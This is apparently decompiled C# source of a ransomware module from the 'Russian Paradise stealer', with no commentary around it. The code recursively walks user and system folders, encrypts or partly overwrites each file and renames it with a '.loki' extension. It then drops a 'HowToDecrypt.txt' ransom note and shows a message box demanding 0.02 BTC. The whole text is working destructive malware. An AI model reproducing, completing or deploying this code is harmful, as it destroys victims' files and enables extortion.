// Token: 0x06000192 RID: 402 RVA: 0x0000B804 File Offset: 0x00009A04 internal static void Start() { if (!File.Exists(Environment.GetEnvironmentVariable("ProgramData") + "\\trig")) { string[] array = new string[] { Environment.GetFolderPath(Environment.SpecialFolder.Recent), Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), Environment.GetFolderPath(Environment.SpecialFolder.MyPictures), Environment.GetFolderPath(Environment.SpecialFolder.MyMusic), Environment.GetFolderPath(Environment.SpecialFolder.MyVideos), Environment.GetFolderPath(Environment.SpecialFolder.Personal), Environment.GetFolderPath(Environment.SpecialFolder.Favorites), Environment.GetFolderPath(Environment.SpecialFolder.CommonDocuments), Environment.GetFolderPath(Environment.SpecialFolder.CommonPictures), Environment.GetFolderPath(Environment.SpecialFolder.CommonMusic), Environment.GetFolderPath(Environment.SpecialFolder.CommonVideos), Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory), Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory), Environment.GetFolderPath(Environment.SpecialFolder.Personal), Environment.GetFolderPath(Environment.SpecialFolder.UserProfile), Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Environment.GetFolderPath(Environment.SpecialFolder.CommonApplicationData), Environment.GetFolderPath(Environment.SpecialFolder.ProgramFilesX86), Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) }; for (int i = 0; i < array.Length; i++) { RansomwareCrypt.GetFile(array[i]); } } File.WriteAllText(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt", string.Concat(new string[] { "IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer:", crypt.AESDecript(Settings.Stealer_version), "\nTo Decrypt: \n - Send 0.02 BTC to: ", Settings.bitcoin_keshel, "\n- Follow All Steps" }), Encoding.UTF8); Thread.Sleep(2000); MessageBox.Show(string.Concat(new string[] { "IMPORTANT INFORMATION!!!!\nAll your files are encrypted with Russian Paradise stealer: ", Settings.Stealer_version, "\nTo Decrypt: \n - Send 0.02 BTC to: ", Settings.bitcoin_keshel, "\n - Follow All Steps" })); Process.Start(Environment.GetFolderPath(Environment.SpecialFolder.CommonDesktopDirectory) + "\\HowToDecrypt.txt"); }
// Token: 0x06000191 RID: 401 RVA: 0x0000B794 File Offset: 0x00009994 public static void GetFile(string string_1) { try { foreach (string text in Directory.GetFiles(string_1)) { if (!Path.GetExtension(text).Contains("loki")) { RansomwareCrypt.EncryptFiles(text); } } string[] array = Directory.GetDirectories(string_1); for (int i = 0; i < array.Length; i++) { RansomwareCrypt.GetFile(array[i]); } } catch (Exception) { } }
// Token: 0x0600018F RID: 399 RVA: 0x0000B534 File Offset: 0x00009734 public static void EncryptFiles(string string_1) { try { try { if (new FileInfo(string_1).Length > 4096L) { if (new FileInfo(string_1).Length <= 30000000L) { byte[] array = new byte[8192]; using (BinaryReader binaryReader = new BinaryReader(File.Open(string_1, FileMode.Open))) { byte[] array2 = RansomwareCrypt.RidjinEncrypt(binaryReader.ReadBytes(4096)); Array.Copy(array2, array, array2.Length); } using (BinaryWriter binaryWriter = new BinaryWriter(File.Open(string_1, FileMode.Open))) { binaryWriter.Write(array); } File.Move(string_1, string_1 + ".loki"); } } else { byte[] bytes = RansomwareCrypt.RidjinEncrypt(File.ReadAllBytes(string_1)); File.WriteAllBytes(string_1, bytes); File.Move(string_1, string_1 + ".loki"); } } catch (Exception) { FileAttributes fileAttributes = File.GetAttributes(string_1); if ((fileAttributes & FileAttributes.ReadOnly) == FileAttributes.ReadOnly) { fileAttributes = RansomwareCrypt.FileAttrib(fileAttributes, FileAttributes.ReadOnly); File.SetAttributes(string_1, fileAttributes); } if (new FileInfo(string_1).Length <= 4096L) { byte[] bytes2 = RansomwareCrypt.RidjinEncrypt(File.ReadAllBytes(string_1)); File.WriteAllBytes(string_1, bytes2); File.Move(string_1, string_1 + ".loki"); } else if (new FileInfo(string_1).Length <= 30000000L) { byte[] buffer = new byte[8192]; using (BinaryReader binaryReader2 = new BinaryReader(File.Open(string_1, FileMode.Open))) { buffer = RansomwareCrypt.RidjinEncrypt(binaryReader2.ReadBytes(4096)); } using (BinaryWriter binaryWriter2 = new BinaryWriter(File.Open(string_1, FileMode.Open))) { binaryWriter2.Write(buffer); } File.Move(string_1, string_1 + ".loki"); } } } catch (Exception) { } }